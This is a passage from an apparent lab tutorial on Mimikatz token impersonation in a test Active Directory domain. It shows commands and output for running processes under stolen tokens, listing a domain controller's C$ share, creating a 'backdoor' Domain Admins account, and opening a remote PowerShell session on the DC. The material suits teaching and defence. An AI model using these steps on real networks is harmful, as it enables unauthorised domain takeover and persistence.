/user: Execute the process with the tokens of this user (instead of specifying the token ID)..
/process: The process to run. By default, the command whoami is executed.
Preparation
List tokens of user to impersonate using the token::list module:
mimikatz # token::list /user:ffast
Token Id : 0
User name : ffast
SID name :
5332 {0;000563b2} 2 F 457263 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary
4432 {0;000563b2} 2 F 2839551 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary
668 {0;00050574} 0 D 329079 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (12g,24p) Impersonation (Impersonation)
668 {0;000563e4} 2 L 353269 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation)
800 {0;000563e4} 2 L 456098 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation)
920 {0;000563e4} 2 L 380750 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation)
920 {0;000563e4} 2 L 387116 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,01p) Impersonation (Identification)
920 {0;000563e4} 2 L 436160 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,02p) Impersonation (Impersonation)
[...]
id
Run a command using a specified token by it's token ID. By default, the command whoami is executed:
mimikatz # token::run /id:457263
Token Id : 457263
User name :
SID name :
676 {0;000f0ac5} 3 F 457263 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary
winattacklab\ffast
user
Run a command using a specified token by it's username. The domain name must not be specified. By default, the command whoami is executed:
mimikatz # token::run /user:ffast
Token Id : 457263
User name :
SID name :
676 {0;000f0ac5} 3 F 457263 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary
winattacklab\ffast
process
Other processes to spawn can be specified.
Example to access DC system drive:
mimikatz # token::run /id:1075487 /process:"cmd.exe /c dir \\dc1\c$"
Token Id : 1075487
User name :
SID name :
7156 {0;000f0ac5} 3 F 1075487 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p)
Primary
Volume in drive \\dc1\c$ is Windows
Volume Serial Number is 6A6C-0DE3
Directory of \\dc1\c$
05/31/2023 06:30 AM <DIR> AzureData
05/31/2023 07:09 AM <DIR> ddns_server
05/31/2023 07:04 AM <DIR> inetpub
05/31/2023 06:46 AM <DIR> Packages
05/05/2023 11:31 AM <DIR> PerfLogs
05/31/2023 07:04 AM <DIR> Program Files
05/05/2023 12:26 PM <DIR> Program Files (x86)
05/31/2023 07:10 AM <DIR> terraform
05/31/2023 07:06 AM <DIR> Users
05/31/2023 07:05 AM <DIR> Windows
05/31/2023 06:33 AM <DIR> WindowsAzure
05/31/2023 07:07 AM <DIR> WSUS
0 File(s) 0 bytes
12 Dir(s) 15,918,473,216 bytes free
Add backdoor user:
mimikatz # token::run /id:1075487 /process:"cmd.exe /c net user backdoor Password.123 /add /domain && net group \"Domain Admins\" backdoor /add /domain && net user backdoor /domain"
Token Id : 1075487
User name :
SID name :
7156 {0;000f0ac5} 3 F 1075487 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary
The request will be processed at a domain controller for domain winattacklab.local.
The command completed successfully.
The request will be processed at a domain controller for domain winattacklab.local.
The command completed successfully.
The request will be processed at a domain controller for domain winattacklab.local.
User name backdoor
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/20/2023 3:59:27 PM
Password expires Never
Password changeable 6/20/2023 3:59:27 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Admins *Domain Users
The command completed successfully.
It's not possible to directly start a new interactive PowerShell process, because the user input of a new process is somehow not handled correctly. However, when PowerShell is started via PsExec, it can be interactively used:
mimikatz # token::run /id:77132228 /process:"C:\tools\PsExec64.exe -accepteula -i powershell.exe"
Token Id : 77132228
User name :
SID name :
8544 {0;0498f042} 2 L 77132228 child\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (14g,05p) Primary
PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
A new PowerShell window is then opened wich can be used interactively:
PS C:\Windows\system32> whoami
winattacklab\ffast
S C:\Windows\system32> Enter-PSSession DC1
[DC1]: PS C:\Users\ffast\Documents> hostname
DC1
[DC1]: PS C:\Users\ffast\Documents> whoami
winattacklab\ffast
[DC1]: PS C:\Users\ffast\Documents> ls \
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/31/2023 6:30 AM AzureData
d----- 5/31/2023 7:09 AM ddns_server
d----- 5/31/2023 7:04 AM inetpub
d----- 5/31/2023 6:46 AM Packages
d----- 5/5/2023 11:31 AM PerfLogs
d-r--- 5/31/2023 7:04 AM Program Files
d----- 5/5/2023 12:26 PM Program Files (x86)
d----- 5/31/2023 7:10 AM terraform
d-r--- 6/22/2023 1:02 PM Users
d-r--- 6/20/2023 5:27 PM Windows
d----- 5/31/2023 6:33 AM WindowsAzure
d----- 5/31/2023 7:07 AM WSUS
Demystifying the kull_m_process_run_data Error
Even as a local administrator, you can get the kull_m_process_run_data error:
mimikatz # token::run /id:1075487 /process:whoami.exe
Token Id : 1075487
User name :
SID name :
7156 {0;000f0ac5} 3 F 1075487 winattacklab\ffast S-1-5-21-1345929560-157546789-2569868433-1123 (15g,24p) Primary
ERROR kull_m_process_run_data ; CreateProcessAsUser (0x00000522)
The error message says that the CreateProcessAsUser function could not be executed.
The token::run command uses the function CreateProceasAsUser to create a new process in the security context of the specified token and requires the following privileges (source: CreateProcessAsUserA function (processthreadsapi.h)):
SeIncreaseQuotaPrivilege privilege
SeAssignPrimaryTokenPrivilege privilege (if the token is not assignable)
A local admin has the permission to get the SeIncreaseQuotaPrivilege privilege but not the SeAssignPrimaryTokenPrivilege privilege:
